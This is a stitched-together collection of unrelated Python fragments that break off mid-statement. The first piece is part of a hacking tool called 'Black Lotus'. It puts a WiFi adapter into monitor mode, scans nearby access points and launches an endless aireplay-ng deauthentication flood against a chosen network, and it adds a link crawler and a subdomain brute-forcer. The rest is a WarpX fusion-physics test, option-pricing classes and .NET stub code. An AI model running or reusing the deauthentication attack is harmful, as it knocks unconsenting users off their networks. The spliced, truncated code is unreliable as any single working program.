wlan_pattern = re.compile("^wlan[0-9]+")
check_wifi_result = wlan_pattern.findall(subprocess.run(["iwconfig"], capture_output=True).stdout.decode())
if len(check_wifi_result) == 0:
print("Please connect a WiFi controller and try again.")
sys.exit(1)
loading()
print("The following WiFi interfaces are available:")
for index, item in enumerate(check_wifi_result):
print(f"{index} - {item}")
while True:
wifi_interface_choice = input("Please select the interface you want to use for the attack: ")
try:
if check_wifi_result[int(wifi_interface_choice)]:
break
except:
print("Please enter a number that corresponds with the choices.")
hacknic = check_wifi_result[int(wifi_interface_choice)]
print("\033[37mWiFi adapter connected!\nNow let's kill conflicting processes:\033[37m")
kill_confilict_processes = subprocess.run(["sudo", "airmon-ng", "check", "kill"])
print("Putting Wifi adapter into monitored mode:")
put_in_monitored_mode = subprocess.run(["sudo", "airmon-ng", "start", hacknic])
discover_access_points = subprocess.Popen(["sudo", "airodump-ng","-w" ,"file","--write-interval", "1","--output-format", "csv", hacknic + "mon"], stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL)
try:
while True:
subprocess.call("clear", shell=True)
for file_name in os.listdir():
fieldnames = ['BSSID', 'First_time_seen', 'Last_time_seen', 'channel', 'Speed', 'Privacy', 'Cipher', 'Authentication', 'Power', 'beacons', 'IV', 'LAN_IP', 'ID_length', 'ESSID', 'Key']
if ".csv" in file_name:
with open(file_name) as csv_h:
csv_h.seek(0)
csv_reader = csv.DictReader(csv_h, fieldnames=fieldnames)
for row in csv_reader:
if row["BSSID"] == "BSSID":
pass
elif row["BSSID"] == "Station MAC":
break
elif check_for_essid(row["ESSID"], active_wireless_networks):
active_wireless_networks.append(row)
print("Scanning. Press Ctrl+C when you want to select the target wireless network.\n")
print("+---+---------------------+------------+------------------------------+ ")
print("|No |BSSID |Channel |ESSID |")
print("+---+---------------------+------------+------------------------------+")
for index, item in enumerate(active_wireless_networks):
print(f"{index}\t{item['BSSID']}\t{item['channel'].strip()}\t\t{item['ESSID']}")
time.sleep(1)
except KeyboardInterrupt:
print("\nReady to attack")
while True:
choice = input("\033[37mBlack Lotus(\033[31mattack\033[37m)\033[31m>\033[37m ")
try:
if active_wireless_networks[int(choice)]:
break
except:
print("Please try again.")
hackbssid = active_wireless_networks[int(choice)]["BSSID"]
hackchannel = active_wireless_networks[int(choice)]["channel"].strip()
subprocess.run(["airmon-ng", "start", hacknic + "mon", hackchannel])
subprocess.Popen(["aireplay-ng", "--deauth", "0", "-a", hackbssid, check_wifi_result[int(wifi_interface_choice)] + "mon"], stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL)
try:
while True:
print("Deauthenticating clients, press ctrl-c to stop")
except KeyboardInterrupt:
print("Stop monitor mode")
subprocess.run(["airmon-ng", "stop", hacknic + "mon"])
print("\033[31mExiting ATOM!!\033[37m")
#----------------------------------------------------------------------------------------------------------------------
total_urls_visited = 0
def links():
colorama.init()
GREEN = colorama.Fore.GREEN
GRAY = colorama.Fore.LIGHTBLACK_EX
RESET = colorama.Fore.RESET
YELLOW = colorama.Fore.YELLOW
internal_urls = set()
external_urls = set()
def is_valid(url):
parsed = urlparse(url)
return bool(parsed.netloc) and bool(parsed.scheme)
def get_all_website_links(url):
urls = set()
domain_name = urlparse(url).netloc
soup = BeautifulSoup(requests.get(url).content, "html.parser")
for a_tag in soup.findAll("a"):
href = a_tag.attrs.get("href")
if href == "" or href is None:
continue
href = urljoin(url, href)
parsed_href = urlparse(href)
href = parsed_href.scheme + "://" + parsed_href.netloc + parsed_href.path
if not is_valid(href):
continue
if href in internal_urls:
continue
if domain_name not in href:
if href not in external_urls:
print(f"{GRAY}[!] External link: {href}{RESET}")
external_urls.add(href)
continue
print(f"{GREEN}[*] Internal link: {href}{RESET}")
urls.add(href)
internal_urls.add(href)
return urls
def crawl(url, max_urls=30):
global total_urls_visited
total_urls_visited += 1
print(f"{YELLOW}[*] Crawling: {url}{RESET}")
links = get_all_website_links(url)
for link in links:
if total_urls_visited > max_urls:
break
crawl(link, max_urls=max_urls)
if __name__ == "__main__":
crawl(input("\033[37m Enter URL \033[36m>\033[37m "))
print("[+] Total Internal links:", len(internal_urls))
print("[+] Total External links:", len(external_urls))
print("[+] Total URLs:", len(external_urls) + len(internal_urls))
#----------------------------------------------------------------------------------------------------------------------
def subdomain():
domain = input("\033[37mBlack Lotus(\033[36mSubdomain/URL\033[37m) \033[31m>\033[37m ")
dir = input("\033[37mBlack Lotus(\033[36mSubdomain/file\033[37m) \033[31m>\033[37m ")
print("\n\033[36mResults will be saved as 'discovered_subdomains.txt'\033[37m")
file = open(dir)
content = file.read()
subdomains = content.splitlines()
discovered_subdomains = []
for subdomain in subdomains:
url = f"http://{subdomain}.{domain}"
try:
requests.get(url)
except requests.ConnectionError:
pass
else:
print("\033[37m[\033[31m+\033[37m] Discovered subdomain:\033[33m", url)
discovered_subdomains.append(url)
with | |
#! /usr/bin/env python
# Copyright 2021 <NAME>
#
# This file is part of WarpX.
#
# License: BSD-3-Clause-LBNL
import os
import sys
import yt
sys.path.insert(1, '../../../../warpx/Regression/Checksum/')
import checksumAPI
import numpy as np
import scipy.constants as scc
## This script performs various checks for the proton boron nuclear fusion module. The simulation
## that we check is made of 5 different tests, each with different proton, boron and alpha species.
##
## The first test is performed in the proton-boron center of mass frame. It could correspond to the
## physical case of a proton beam colliding with a boron beam. The kinetic energy of the colliding
## particles depends on the cell number in the z direction and varies in the few keV to few MeV
## range. All the particles within a cell have the exact same momentum, which allows detailed
## checks of the energy of produced alpha particles. The proton and boron species have the same
## density and number of particles in this test. The number of produced alphas is much smaller than
## the initial number of protons and borons.
##
## The second test is performed in the boron rest frame. It corresponds to the physical case of a
## low density proton beam colliding with a high-density proton+boron target. The energy of the
## proton beam is varied in the few keV to few MeV range, depending on the cell number in the z
## direction. As in the previous case, all the particles within a cell have the exact same
## momentum, which allows detailed checks of the energy of produced alpha particles. In this test,
## there are 100 immobile boron and 100 immobile proton macroparticles per cell, as well as 900
## beam proton macroparticles per cell. The density of the immobile particles is 6 orders of
## magnitude higher than the number of beam particles, which means that they have a much higher
## weight. This test is similar to the example given in section 3 of Higginson et al.,
## Journal of Computational Physics, 388, 439–453 (2019), which was found to be sensitive to the way
## unsampled pairs are accounted for. As before, the number of produced alphas is much smaller than
## the initial number of protons and borons.
##
## The third test corresponds to a Maxwellian plasma with a 44 keV temperature. The alpha yield is
## directly compared to the analytical fits of <NAME> and <NAME>, Nuclear Fusion, 40, 865
## (2000) for a thermal plasma.
##
## The fourth test corresponds to a plasma with an extremely small boron density, so that all boron
## macroparticles should have disappeared by the end of the simulation, which we verify.
##
## The fifth test is exactly the same as the fourth test, except that the
## fusion_probability_threshold parameter is increased to an excessive value. Because of that, we
## severely underestimate the fusion yield and boron macroparticles remain at the end of the
## simulation, which we verify.
##
## In all simulations, we check particle number, charge, momentum and energy conservation and
## perform basic checks regarding the produced particles. When possible, we also compare the number
## of produced macroparticles, fusion yield and energy of the produced particles to theoretical
## values.
##
## Please be aware that the relative tolerances are often set empirically in this analysis script,
## so it would not be surprising if some tolerances needed to be increased in the future.
default_tol = 1.e-12 # Default relative tolerance
## Some physical parameters
keV_to_Joule = scc.e*1e3
MeV_to_Joule = scc.e*1e6
barn_to_square_meter = 1.e-28
m_p = scc.m_p # Proton mass
m_b = 10.9298*m_p # Boron 11 mass
m_reduced = m_p*m_b/(m_p+m_b)
m_a = 3.97369*m_p # Alpha mass
m_be = 7.94748*m_p # Beryllium 8 mass
Z_boron = 5.
Z_proton = 1.
E_Gamow = (Z_boron*Z_proton*np.pi*scc.fine_structure)**2*2.*m_reduced*scc.c**2
E_Gamow_MeV = E_Gamow/MeV_to_Joule
E_Gamow_keV = E_Gamow/keV_to_Joule
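# Sanity check of the Gamow energy above (rounded): Z_boron*Z_proton*pi*
# fine_structure ~ 0.1146, squared ~ 0.01314, times 2*m_reduced*c^2
# (~1719 MeV) gives E_Gamow ~ 22.6 MeV, the standard value for p-B11.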
E_fusion = 8.59009*MeV_to_Joule # Energy released during p + B -> alpha + Be
E_decay = 0.0918984*MeV_to_Joule # Energy released during Be -> 2*alpha
E_fusion_total = E_fusion + E_decay # Energy released during p + B -> 3*alpha
## Some numerical parameters for this test
size_x = 8
size_y = 8
size_z = 16
dV_total = size_x*size_y*size_z # Total simulation volume
# Volume of a slice corresponding to a single cell in the z direction. In tests 1 and 2, all the
# particles of a given species in the same slice have the exact same momentum
dV_slice = size_x*size_y
dt = 1./(scc.c*np.sqrt(3.))
# In tests 1 and 2, the energy in cell number i (in the z direction) is typically Energy_step * i**2
Energy_step = 22.*keV_to_Joule
def is_close(val1, val2, rtol=default_tol, atol=0.):
## Wrapper around numpy.isclose, used to override the default tolerances.
return np.isclose(val1, val2, rtol=rtol, atol=atol)
def add_existing_species_to_dict(yt_ad, data_dict, species_name, prefix, suffix):
data_dict[prefix+"_px_"+suffix] = yt_ad[species_name, "particle_momentum_x"].v
data_dict[prefix+"_py_"+suffix] = yt_ad[species_name, "particle_momentum_y"].v
data_dict[prefix+"_pz_"+suffix] = yt_ad[species_name, "particle_momentum_z"].v
data_dict[prefix+"_w_"+suffix] = yt_ad[species_name, "particle_weight"].v
data_dict[prefix+"_id_"+suffix] = yt_ad[species_name, "particle_id"].v
data_dict[prefix+"_cpu_"+suffix] = yt_ad[species_name, "particle_cpu"].v
data_dict[prefix+"_z_"+suffix] = yt_ad[species_name, "particle_position_z"].v
def add_empty_species_to_dict(data_dict, species_name, prefix, suffix):
data_dict[prefix+"_px_"+suffix] = np.empty(0)
data_dict[prefix+"_py_"+suffix] = np.empty(0)
data_dict[prefix+"_pz_"+suffix] = np.empty(0)
data_dict[prefix+"_w_"+suffix] = np.empty(0)
data_dict[prefix+"_id_"+suffix] = np.empty(0)
data_dict[prefix+"_cpu_"+suffix] = np.empty(0)
data_dict[prefix+"_z_"+suffix] = np.empty(0)
def add_species_to_dict(yt_ad, data_dict, species_name, prefix, suffix):
try:
## If species exist, we add its data to the dictionary
add_existing_species_to_dict(yt_ad, data_dict, species_name, prefix, suffix)
except yt.utilities.exceptions.YTFieldNotFound:
## If the species does not exist, we avoid a Python crash and add empty arrays to the
## dictionary. Currently, this happens for the boron species in test number 4, which
## entirely fuses into alphas.
add_empty_species_to_dict(data_dict, species_name, prefix, suffix)
def check_particle_number_conservation(data):
total_w_proton_start = np.sum(data["proton_w_start"])
total_w_proton_end = np.sum(data["proton_w_end"])
total_w_boron_start = np.sum(data["boron_w_start"])
total_w_boron_end = np.sum(data["boron_w_end"])
consumed_proton = total_w_proton_start - total_w_proton_end
consumed_boron = total_w_boron_start - total_w_boron_end
created_alpha = np.sum(data["alpha_w_end"])
assert(consumed_proton >= 0.)
assert(consumed_boron >= 0.)
assert(created_alpha >= 0.)
## Check that number of consumed proton and consumed boron are equal
assert_scale = max(total_w_proton_start, total_w_boron_start)
assert(is_close(consumed_proton, consumed_boron, rtol = 0., atol = default_tol*assert_scale))
## Check that number of consumed particles corresponds to number of produced alpha
## Factor 3 is here because each nuclear fusion reaction produces 3 alphas
assert(is_close(total_w_proton_start, total_w_proton_end + created_alpha/3.))
assert(is_close(total_w_boron_start, total_w_boron_end + created_alpha/3.))
def compute_energy_array(data, species_name, suffix, m):
## Relativistic computation of kinetic energy for a given species
psq_array = data[species_name+'_px_'+suffix]**2 + data[species_name+'_py_'+suffix]**2 + \
data[species_name+'_pz_'+suffix]**2
rest_energy = m*scc.c**2
return np.sqrt(psq_array*scc.c**2 + rest_energy**2) - rest_energy
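# The expression above is the relativistic kinetic energy
#   E_kin = sqrt((p*c)^2 + (m*c^2)^2) - m*c^2,
# which reduces to p**2/(2*m) when p << m*c. Quick sanity check with an
# illustrative momentum:
#
#   p = 5e-20  # kg*m/s, about 0.1*m_p*c
#   ek = np.sqrt((p*scc.c)**2 + (m_p*scc.c**2)**2) - m_p*scc.c**2
#   assert np.isclose(ek, p**2/(2*m_p), rtol=1e-2)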
def check_energy_conservation(data):
proton_energy_start = compute_energy_array(data, "proton", "start", m_p)
proton_energy_end = compute_energy_array(data, "proton", "end", m_p)
boron_energy_start = compute_energy_array(data, "boron", "start", m_b)
boron_energy_end = compute_energy_array(data, "boron", "end", m_b)
alpha_energy_end = compute_energy_array(data, "alpha", "end", m_a)
total_energy_start = np.sum(proton_energy_start*data["proton_w_start"]) + \
np.sum(boron_energy_start*data["boron_w_start"])
total_energy_end = np.sum(proton_energy_end*data["proton_w_end"]) + \
np.sum(boron_energy_end*data["boron_w_end"]) + \
np.sum(alpha_energy_end*data["alpha_w_end"])
## Factor 3 is here because each nuclear fusion reaction produces 3 alphas
n_fusion_reaction = np.sum(data["alpha_w_end"])/3.
assert(is_close(total_energy_end,
total_energy_start + n_fusion_reaction*E_fusion_total,
rtol = 1.e-8))
def check_momentum_conservation(data):
proton_total_px_start = np.sum(data["proton_px_start"]*data["proton_w_start"])
proton_total_py_start = np.sum(data["proton_py_start"]*data["proton_w_start"])
proton_total_pz_start = np.sum(data["proton_pz_start"]*data["proton_w_start"])
proton_total_px_end = np.sum(data["proton_px_end"]*data["proton_w_end"])
proton_total_py_end = np.sum(data["proton_py_end"]*data["proton_w_end"])
proton_total_pz_end = np.sum(data["proton_pz_end"]*data["proton_w_end"])
boron_total_px_start = np.sum(data["boron_px_start"]*data["boron_w_start"])
boron_total_py_start = np.sum(data["boron_py_start"]*data["boron_w_start"])
boron_total_pz_start = np.sum(data["boron_pz_start"]*data["boron_w_start"])
boron_total_px_end = np.sum(data["boron_px_end"]*data["boron_w_end"])
boron_total_py_end = np.sum(data["boron_py_end"]*data["boron_w_end"])
boron_total_pz_end = np.sum(data["boron_pz_end"]*data["boron_w_end"])
alpha_total_px_end = np.sum(data["alpha_px_end"]*data["alpha_w_end"])
alpha_total_py_end = np.sum(data["alpha_py_end"]*data["alpha_w_end"])
alpha_total_pz_end = np.sum(data["alpha_pz_end"]*data["alpha_w_end"])
total_px_start = proton_total_px_start + boron_total_px_start
total_py_start = proton_total_py_start + boron_total_py_start
total_pz_start = proton_total_pz_start + boron_total_pz_start
total_px_end = proton_total_px_end + boron_total_px_end + alpha_total_px_end
total_py_end = proton_total_py_end + boron_total_py_end + alpha_total_py_end
total_pz_end = proton_total_pz_end + boron_total_pz_end + alpha_total_pz_end
## Absolute tolerance is needed because sometimes the initial momentum is exactly 0
assert(is_close(total_px_start, total_px_end, atol=1.e-15))
assert(is_close(total_py_start, total_py_end, atol=1.e-15))
assert(is_close(total_pz_start, total_pz_end, atol=1.e-15))
def check_id(data):
## Check that all created particles have unique id + cpu identifier (two particles with
## different cpu can have the same id)
complex_id = data["alpha_id_end"] + 1j*data["alpha_cpu_end"]
assert(complex_id.shape == np.unique(complex_id).shape)
def basic_product_particles_check(data):
## For each nuclear fusion reaction in the code, we create 6 alpha macroparticles. So the
## total number of alpha macroparticles must be a multiple of 6.
num_alpha = data["alpha_w_end"].shape[0]
assert(num_alpha%6 == 0)
## The weight of the 6 macroparticles coming from a single fusion event should be the same.
## We verify this here.
assert(np.array_equal(data["alpha_w_end"][::6], data["alpha_w_end"][1::6]))
assert(np.array_equal(data["alpha_w_end"][::6], data["alpha_w_end"][2::6]))
assert(np.array_equal(data["alpha_w_end"][::6], data["alpha_w_end"][3::6]))
assert(np.array_equal(data["alpha_w_end"][::6], data["alpha_w_end"][4::6]))
assert(np.array_equal(data["alpha_w_end"][::6], data["alpha_w_end"][5::6]))
## When we create 6 macroparticles, the first has the exact same momentum as the second, the
## third has the same as the fourth and the fifth has the same as the sixth. We verify this
## here
assert(np.array_equal(data["alpha_px_end"][::6], data["alpha_px_end"][1::6]))
assert(np.array_equal(data["alpha_py_end"][::6], data["alpha_py_end"][1::6]))
assert(np.array_equal(data["alpha_pz_end"][::6], data["alpha_pz_end"][1::6]))
assert(np.array_equal(data["alpha_px_end"][2::6], data["alpha_px_end"][3::6]))
assert(np.array_equal(data["alpha_py_end"][2::6], data["alpha_py_end"][3::6]))
assert(np.array_equal(data["alpha_pz_end"][2::6], data["alpha_pz_end"][3::6]))
assert(np.array_equal(data["alpha_px_end"][4::6], | |
<gh_stars>0
import scipy.stats as spst
import warnings
import numpy as np
from itertools import product, combinations
from . import bsm
from . import norm
from . import gamma
from . import nsvh
from . import opt_abc as opt
class BsmSpreadKirk(opt.OptMaABC):
"""
Kirk's approximation for spread option.
References:
<NAME>. (1995). Correlation in the energy markets. In Managing Energy Price Risk
(First, pp. 71–78). Risk Publications.
Examples:
>>> import numpy as np
>>> import pyfeng as pf
>>> m = pf.BsmSpreadKirk((0.2, 0.3), cor=-0.5)
>>> m.price(np.arange(-2, 3) * 10, [100, 120], 1.3)
array([22.15632247, 17.18441817, 12.98974214, 9.64141666, 6.99942072])
"""
weight = np.array([1, -1])
def price(self, strike, spot, texp, cp=1):
df = np.exp(-texp * self.intr)
fwd = np.array(spot) * (
1.0 if self.is_fwd else np.exp(-texp * np.array(self.divr)) / df
)
assert fwd.shape[-1] == self.n_asset
fwd1 = fwd[..., 0] - np.minimum(strike, 0)
fwd2 = fwd[..., 1] + np.maximum(strike, 0)
sig1 = self.sigma[0] * fwd[..., 0] / fwd1
sig2 = self.sigma[1] * fwd[..., 1] / fwd2
sig_spd = np.sqrt(sig1 * (sig1 - 2.0 * self.rho * sig2) + sig2 ** 2)
price = bsm.Bsm.price_formula(fwd2, fwd1, sig_spd, texp, cp=cp, is_fwd=True)
return df * price
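# The method above is Kirk's reduction of the spread option to a single
# Black-Scholes call on fwd1 struck at fwd2: each vol is rescaled to the
# shifted forwards (sig_i' = sigma_i * F_i / F_i') and combined as
#   sig_spd^2 = sig1'^2 - 2*rho*sig1'*sig2' + sig2'^2.
# The min/max split of the strike lets the same formula cover K of either sign.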
class BsmSpreadBjerksund2014(opt.OptMaABC):
"""
Bjerksund & Stensland (2014)'s approximation for spread option.
References:
<NAME>., & <NAME>. (2014). Closed form spread option valuation.
Quantitative Finance, 14(10), 1785–1794. https://doi.org/10.1080/14697688.2011.617775
Examples:
>>> import numpy as np
>>> import pyfeng as pf
>>> m = pf.BsmSpreadBjerksund2014((0.2, 0.3), cor=-0.5)
>>> m.price(np.arange(-2, 3) * 10, [100, 120], 1.3)
array([22.13172022, 17.18304247, 12.98974214, 9.54431944, 6.80612597])
"""
weight = np.array([1, -1])
def price(self, strike, spot, texp, cp=1):
df = np.exp(-texp * self.intr)
fwd = np.array(spot) * (
1.0 if self.is_fwd else np.exp(-texp * np.array(self.divr)) / df
)
assert fwd.shape[-1] == self.n_asset
fwd1 = fwd[..., 0]
fwd2 = fwd[..., 1]
std11 = self.sigma[0] ** 2 * texp
std12 = self.sigma[0] * self.sigma[1] * texp
std22 = self.sigma[1] ** 2 * texp
aa = fwd2 + strike
bb = fwd2 / aa
std = np.sqrt(std11 - 2 * bb * self.rho * std12 + bb ** 2 * std22)
d3 = np.log(fwd1 / aa)
d1 = (d3 + 0.5 * std11 - bb * (self.rho * std12 - 0.5 * bb * std22)) / std
d2 = (d3 - 0.5 * std11 + self.rho * std12 + bb * (0.5 * bb - 1) * std22) / std
d3 = (d3 - 0.5 * std11 + 0.5 * bb ** 2 * std22) / std
price = cp * (
fwd1 * spst.norm.cdf(cp * d1)
- fwd2 * spst.norm.cdf(cp * d2)
- strike * spst.norm.cdf(cp * d3)
)
return df * price
class NormBasket(opt.OptMaABC):
"""
Basket option pricing under the multiasset Bachelier model
"""
weight = None
def __init__(self, sigma, cor=None, weight=None, intr=0.0, divr=0.0, is_fwd=False):
"""
Args:
sigma: model volatilities of `n_asset` assets. (n_asset, ) array
cor: correlation. If matrix, used as it is. (n_asset, n_asset)
If scalar, correlation matrix is constructed with all same off-diagonal values.
weight: asset weights, If None, equally weighted as 1/n_asset
If scalar, equal weights of the value
If 1-D array, uses as it is. (n_asset, )
intr: interest rate (domestic interest rate)
divr: vector of dividend/convenience yield (foreign interest rate) 0-D or (n_asset, ) array
is_fwd: if True, treat `spot` as forward price. False by default.
"""
super().__init__(sigma, cor=cor, intr=intr, divr=divr, is_fwd=is_fwd)
if weight is None:
self.weight = np.ones(self.n_asset) / self.n_asset
elif np.isscalar(weight):
self.weight = np.ones(self.n_asset) * weight
else:
assert len(weight) == self.n_asset
self.weight = np.array(weight)
def price(self, strike, spot, texp, cp=1):
df = np.exp(-texp * self.intr)
fwd = np.array(spot) * (
1.0 if self.is_fwd else np.exp(-texp * np.array(self.divr)) / df
)
assert fwd.shape[-1] == self.n_asset
fwd_basket = fwd @ self.weight
vol_basket = np.sqrt(self.weight @ self.cov_m @ self.weight)
price = norm.Norm.price_formula(
strike, fwd_basket, vol_basket, texp, cp=cp, is_fwd=True
)
return df * price
class NormSpread(opt.OptMaABC):
"""
Spread option pricing under the Bachelier model.
This is a special case of NormBasket with weight = (1, -1)
Examples:
>>> import numpy as np
>>> import pyfeng as pf
>>> m = pf.NormSpread((20, 30), cor=-0.5, intr=0.05)
>>> m.price(np.arange(-2, 3) * 10, [100, 120], 1.3)
array([17.95676186, 13.74646821, 10.26669936, 7.47098719, 5.29057157])
"""
weight = np.array([1, -1])
price = NormBasket.price
class BsmBasketLevy1992(NormBasket):
"""
Basket option pricing with the log-normal approximation of Levy & Turnbull (1992)
References:
- <NAME>., & <NAME>. (1992). Average intelligence. Risk, 1992(2), 53–57.
- <NAME>., <NAME>., <NAME>., & <NAME>. (2004). An analysis of pricing methods for basket options.
Wilmott Magazine, 2004(7), 82–89.
Examples:
>>> import numpy as np
>>> import pyfeng as pf
>>> strike = np.arange(50, 151, 10)
>>> m = pf.BsmBasketLevy1992(sigma=0.4*np.ones(4), cor=0.5)
>>> m.price(strike, spot=100*np.ones(4), texp=5)
array([54.34281026, 47.521086 , 41.56701301, 36.3982413 , 31.92312156,
28.05196621, 24.70229571, 21.800801 , 19.28360474, 17.09570196,
15.19005654])
"""
def price(self, strike, spot, texp, cp=1):
df = np.exp(-texp * self.intr)
fwd = np.array(spot) * (
1.0 if self.is_fwd else np.exp(-texp * np.array(self.divr)) / df
)
assert fwd.shape[-1] == self.n_asset
fwd_basket = fwd * self.weight
m1 = np.sum(fwd_basket, axis=-1)
m2 = np.sum(fwd_basket @ np.exp(self.cov_m * texp) * fwd_basket, axis=-1)
sig = np.sqrt(np.log(m2 / (m1 ** 2)) / texp)
price = bsm.Bsm.price_formula(strike, m1, sig, texp, cp=cp, is_fwd=True)
return df * price
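# Moment matching used above: with M1 = E[B_T] and M2 = E[B_T^2] for the
# basket B_T, a lognormal with the same first two moments must satisfy
#   sigma^2 * T = log(M2 / M1^2),
# since E[X^2] = E[X]^2 * exp(sigma^2 * T) for lognormal X. The quadratic
# form computes M2 = sum_ij w_i F_i w_j F_j exp(cov_ij * T).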
class BsmBasketMilevsky1998(NormBasket):
"""
Basket option pricing with the inverse gamma distribution of Milevsky & Posner (1998)
References:
<NAME>., & <NAME>. (1998). A Closed-Form Approximation for Valuing Basket Options.
The Journal of Derivatives, 5(4), 54–61. https://doi.org/10.3905/jod.1998.408005
<NAME>., <NAME>., <NAME>., & <NAME>. (2004). An analysis of pricing methods for basket options.
Wilmott Magazine, 2004(7), 82–89.
Examples:
>>> import numpy as np
>>> import pyfeng as pf
>>> strike = np.arange(50, 151, 10)
>>> m = pf.BsmBasketMilevsky1998(sigma=0.4*np.ones(4), cor=0.5)
>>> m.price(strike, spot=100*np.ones(4), texp=5)
array([51.93069524, 44.40986 , 38.02596564, 32.67653542, 28.21560931,
24.49577509, 21.38543199, 18.77356434, 16.56909804, 14.69831445,
13.10186928])
"""
def price(self, strike, spot, texp, cp=1):
df = np.exp(-texp * self.intr)
fwd = np.array(spot) * (
1.0 if self.is_fwd else np.exp(-texp * np.array(self.divr)) / df
)
assert fwd.shape[-1] == self.n_asset
fwd_basket = fwd * self.weight
m1 = np.sum(fwd_basket, axis=-1)
m2 = np.sum(fwd_basket @ np.exp(self.cov_m * texp) * fwd_basket, axis=-1)
alpha = 1 / (m2 / m1 ** 2 - 1) + 2
beta = (alpha - 1) * m1
price = gamma.InvGam.price_formula(
strike, m1, texp, alpha, beta, cp=cp, is_fwd=True
)
return df * price
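# Inverse-gamma moment matching used above: the distribution has mean
# beta/(alpha - 1) and second moment beta^2/((alpha - 1)(alpha - 2)), so
# M2/M1^2 = (alpha - 1)/(alpha - 2), which inverts to
#   alpha = 1/(M2/M1^2 - 1) + 2,   beta = (alpha - 1)*M1,
# exactly the two lines above.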
class BsmMax2(opt.OptMaABC):
"""
Option on the max of two assets.
Payout = max( max(F_1, F_2) - K, 0 ) for a call or max( K - max(F_1, F_2), 0 ) for a put option
References:
<NAME>. (1991). Somewhere Over the Rainbow. Risk, 1991(11), 63–66.
Examples:
>>> import numpy as np
>>> import pyfeng as pf
>>> m = pf.BsmMax2(0.2*np.ones(2), cor=0, divr=0.1, intr=0.05)
>>> m.price(strike=[90, 100, 110], spot=100*np.ones(2), texp=3)
array([15.86717049, 11.19568103, 7.71592217])
"""
m_switch = None
def __init__(self, sigma, cor=None, weight=None, intr=0.0, divr=0.0, is_fwd=False):
super().__init__(sigma, cor=cor, intr=intr, divr=divr, is_fwd=is_fwd)
self.m_switch = BsmSpreadKirk(sigma, cor, is_fwd=True)
def price(self, strike, spot, texp, cp=1):
sig = self.sigma
df = np.exp(-texp * self.intr)
fwd = np.array(spot) * (
1.0 if self.is_fwd else np.exp(-texp * np.array(self.divr)) / df
)
assert fwd.shape[-1] == self.n_asset
sig_std = sig * np.sqrt(texp)
spd_rho = np.sqrt(np.dot(sig, sig) - 2 * self.rho * sig[0] * sig[1])
spd_std = spd_rho * np.sqrt(texp)
# -x and y as rows
# supposed to be -log(fwd/strike) but strike is added later
xx = -np.log(fwd) / sig_std - 0.5 * sig_std
fwd_ratio = fwd[0] / fwd[1]
yy = np.log([fwd_ratio, 1 / fwd_ratio]) / spd_std + 0.5 * spd_std
rho12 = (
np.array([self.rho * sig[1] - sig[0], self.rho * sig[0] - sig[1]]) / spd_rho
)
mu0 = np.zeros(2)
cor_m1 = rho12[0] + (1 - rho12[0]) * np.eye(2)
cor_m2 = rho12[1] + (1 - rho12[1]) * np.eye(2)
strike_isscalar = np.isscalar(strike)
strike = np.atleast_1d(strike)
cp = cp * np.ones_like(strike)
n_strike = len(strike)
# This is the price of max(S1, S2), using max(S1, S2) = max(S1 - S2, 0) + S2.
# With strike = 0 the Kirk approximation reduces to Margrabe's exchange
# (switch) option price, which is exact.
parity = 0 if np.all(cp > 0) else self.m_switch.price(0, fwd, texp) + fwd[1]
price = np.zeros_like(strike, | |
ReparsePoint (1024), SparseFile (512), System (4), Temporary (256)
"""
def __eq__(self, *args): #cannot find CLR method
""" x.__eq__(y) <==> x==yx.__eq__(y) <==> x==yx.__eq__(y) <==> x==y """
pass
def __format__(self, *args): #cannot find CLR method
""" __format__(formattable: IFormattable, format: str) -> str """
pass
def __ge__(self, *args): #cannot find CLR method
pass
def __gt__(self, *args): #cannot find CLR method
pass
def __init__(self, *args): #cannot find CLR method
""" x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """
pass
def __le__(self, *args): #cannot find CLR method
pass
def __lt__(self, *args): #cannot find CLR method
pass
def __ne__(self, *args): #cannot find CLR method
pass
def __reduce_ex__(self, *args): #cannot find CLR method
pass
def __str__(self, *args): #cannot find CLR method
pass
Archive = None
Compressed = None
Device = None
Directory = None
Encrypted = None
Hidden = None
IntegrityStream = None
Normal = None
NoScrubData = None
NotContentIndexed = None
Offline = None
ReadOnly = None
ReparsePoint = None
SparseFile = None
System = None
Temporary = None
value__ = None
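# Hedged usage sketch for the FileAttributes stub above under IronPython
# (the import and path are standard .NET usage, not part of this stub file):
#
#   from System.IO import File, FileAttributes
#   attrs = File.GetAttributes(r'C:\temp\example.txt')
#   if (attrs & FileAttributes.ReadOnly) == FileAttributes.ReadOnly:
#       File.SetAttributes(r'C:\temp\example.txt', attrs & ~FileAttributes.ReadOnly)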
class FileFormatException(FormatException, ISerializable, _Exception):
"""
The exception that is thrown when an input file or a data stream that is supposed to conform to a certain file format specification is malformed.
FileFormatException()
FileFormatException(message: str)
FileFormatException(message: str, innerException: Exception)
FileFormatException(sourceUri: Uri)
FileFormatException(sourceUri: Uri, message: str)
FileFormatException(sourceUri: Uri, innerException: Exception)
FileFormatException(sourceUri: Uri, message: str, innerException: Exception)
"""
def add_SerializeObjectState(self, *args): #cannot find CLR method
""" add_SerializeObjectState(self: Exception, value: EventHandler[SafeSerializationEventArgs]) """
pass
def GetObjectData(self, info, context):
"""
GetObjectData(self: FileFormatException, info: SerializationInfo, context: StreamingContext)
Sets the System.Runtime.Serialization.SerializationInfo object with the file
name and additional exception information.
info: The object that holds the serialized object data.
context: The contextual information about the source or destination.
"""
pass
def remove_SerializeObjectState(self, *args): #cannot find CLR method
""" remove_SerializeObjectState(self: Exception, value: EventHandler[SafeSerializationEventArgs]) """
pass
def __init__(self, *args): #cannot find CLR method
""" x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """
pass
@staticmethod # known case of __new__
def __new__(self, *__args):
"""
__new__(cls: type)
__new__(cls: type, message: str)
__new__(cls: type, message: str, innerException: Exception)
__new__(cls: type, sourceUri: Uri)
__new__(cls: type, sourceUri: Uri, message: str)
__new__(cls: type, sourceUri: Uri, innerException: Exception)
__new__(cls: type, sourceUri: Uri, message: str, innerException: Exception)
__new__(cls: type, info: SerializationInfo, context: StreamingContext)
"""
pass
def __reduce_ex__(self, *args): #cannot find CLR method
pass
def __str__(self, *args): #cannot find CLR method
pass
SourceUri = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
